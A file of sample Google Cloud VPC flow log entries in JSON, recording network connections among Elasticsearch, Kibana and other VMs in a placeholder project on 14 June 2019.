-{"insertId":"ut8lbrffooxz2","jsonPayload":{"bytes_sent":"65154","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33542},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565272745Z","packets_sent":"360","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150720950Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxyo","jsonPayload":{"bytes_sent":"13643","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33970},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"99","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466657665Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxzc","jsonPayload":{"bytes_sent":"34509840","connection":{"dest_ip":"10.49.136.133","dest_port":46864,"protocol":6,"src_ip":"203.0.113.93","src_port":9243},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"simianhacker-demo","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:29.432367659Z","packets_sent":"8690","reporter":"DEST","rtt_msec":"36","start_time":"2019-06-14T03:40:17.343890802Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxz7","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.12","src_port":34836},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:48:39.076420731Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:48:38.961050187Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxyu","jsonPayload":{"bytes_sent":"63671","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33554},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565311154Z","packets_sent":"367","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500506974Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxyv","jsonPayload":{"bytes_sent":"51075","connection":{"dest_ip":"203.0.113.58","dest_port":65320,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220714119Z","packets_sent":"608","reporter":"SRC","rtt_msec":"220","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.560917237Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxz0","jsonPayload":{"bytes_sent":"197840","connection":{"dest_ip":"203.0.113.134","dest_port":33562,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.393910944Z","packets_sent":"258","reporter":"SRC","rtt_msec":"192","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074897435Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxys","jsonPayload":{"bytes_sent":"173805495","connection":{"dest_ip":"203.0.113.93","dest_port":9243,"protocol":6,"src_ip":"10.49.136.133","src_port":46864},"end_time":"2019-06-14T03:49:58.716492806Z","packets_sent":"44438","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"simianhacker-demo","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:17.306085222Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxyx","jsonPayload":{"bytes_sent":"1468","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.12","src_port":33478},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:45:37.301953198Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:45:37.186193305Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxz4","jsonPayload":{"bytes_sent":"159704","connection":{"dest_ip":"203.0.113.134","dest_port":33548,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.393651211Z","packets_sent":"241","reporter":"SRC","rtt_msec":"50","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.147252064Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxz3","jsonPayload":{"bytes_sent":"70775","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65320},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220714119Z","packets_sent":"732","reporter":"DEST","rtt_msec":"220","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.560917237Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxz9","jsonPayload":{"bytes_sent":"281147","connection":{"dest_ip":"10.87.40.76","dest_port":33542,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565272745Z","packets_sent":"246","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150720950Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxyr","jsonPayload":{"bytes_sent":"63590","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33548},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:48.537763242Z","packets_sent":"340","reporter":"DEST","rtt_msec":"50","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.147252064Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxyy","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"203.0.113.12","dest_port":34836,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:48:39.076420731Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:48:38.961050187Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"1ulp77rfdvho4g","jsonPayload":{"bytes_sent":"1239","connection":{"dest_ip":"10.139.99.242","dest_port":22,"protocol":6,"src_ip":"192.0.2.165","src_port":59623},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:52.361155668Z","packets_sent":"18","reporter":"DEST","rtt_msec":"233","src_location":{"asn":45899,"city":"Vĩnh Yên","continent":"Asia","country":"vnm","region":"Vinh Phuc Province"},"start_time":"2019-06-14T03:40:46.541094678Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho5r","jsonPayload":{"bytes_sent":"63853","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33552},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.213244028Z","packets_sent":"363","reporter":"SRC","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075811571Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho5k","jsonPayload":{"bytes_sent":"1458","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"198.51.100.107","src_port":33924},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:46:20.745658276Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:46:20.634435179Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho55","jsonPayload":{"bytes_sent":"252397","connection":{"dest_ip":"203.0.113.134","dest_port":33534,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597088427Z","packets_sent":"260","reporter":"SRC","rtt_msec":"311","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075942176Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho60","jsonPayload":{"bytes_sent":"205787","connection":{"dest_ip":"203.0.113.134","dest_port":33694,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565117754Z","packets_sent":"265","reporter":"SRC","rtt_msec":"216","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.566551903Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho49","jsonPayload":{"bytes_sent":"106409","connection":{"dest_ip":"203.0.113.58","dest_port":65263,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220748025Z","packets_sent":"607","reporter":"SRC","rtt_msec":"87","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.270990648Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho4t","jsonPayload":{"bytes_sent":"61242","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33534},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597088427Z","packets_sent":"356","reporter":"DEST","rtt_msec":"311","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075942176Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho68","jsonPayload":{"bytes_sent":"248826","connection":{"dest_ip":"203.0.113.101","dest_port":49680,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"siem-windows","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"windows-isolated","vpc_name":"windows-isolated"},"end_time":"2019-06-14T03:49:55.705469925Z","packets_sent":"735","reporter":"SRC","rtt_msec":"113","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.711043814Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho5n","jsonPayload":{"bytes_sent":"1777","connection":{"dest_ip":"192.0.2.117","dest_port":33862,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:46:11.779780615Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:46:11.655143526Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho5l","jsonPayload":{"bytes_sent":"116845","connection":{"dest_ip":"203.0.113.58","dest_port":65321,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.312105537Z","packets_sent":"594","reporter":"SRC","rtt_msec":"219","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.843986502Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho65","jsonPayload":{"bytes_sent":"4614","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33524},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.461087350Z","packets_sent":"58","reporter":"DEST","rtt_msec":"0","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:24.790136141Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho4b","jsonPayload":{"bytes_sent":"50379","connection":{"dest_ip":"192.0.2.177","dest_port":60112,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:18.224268993Z","packets_sent":"130","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:14.031541248Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho4m","jsonPayload":{"bytes_sent":"200417","connection":{"dest_ip":"10.87.40.76","dest_port":33552,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.213244028Z","packets_sent":"250","reporter":"DEST","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075811571Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho5t","jsonPayload":{"bytes_sent":"30233","connection":{"dest_ip":"203.0.113.134","dest_port":33524,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.461087350Z","packets_sent":"37","reporter":"SRC","rtt_msec":"0","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:24.790136141Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 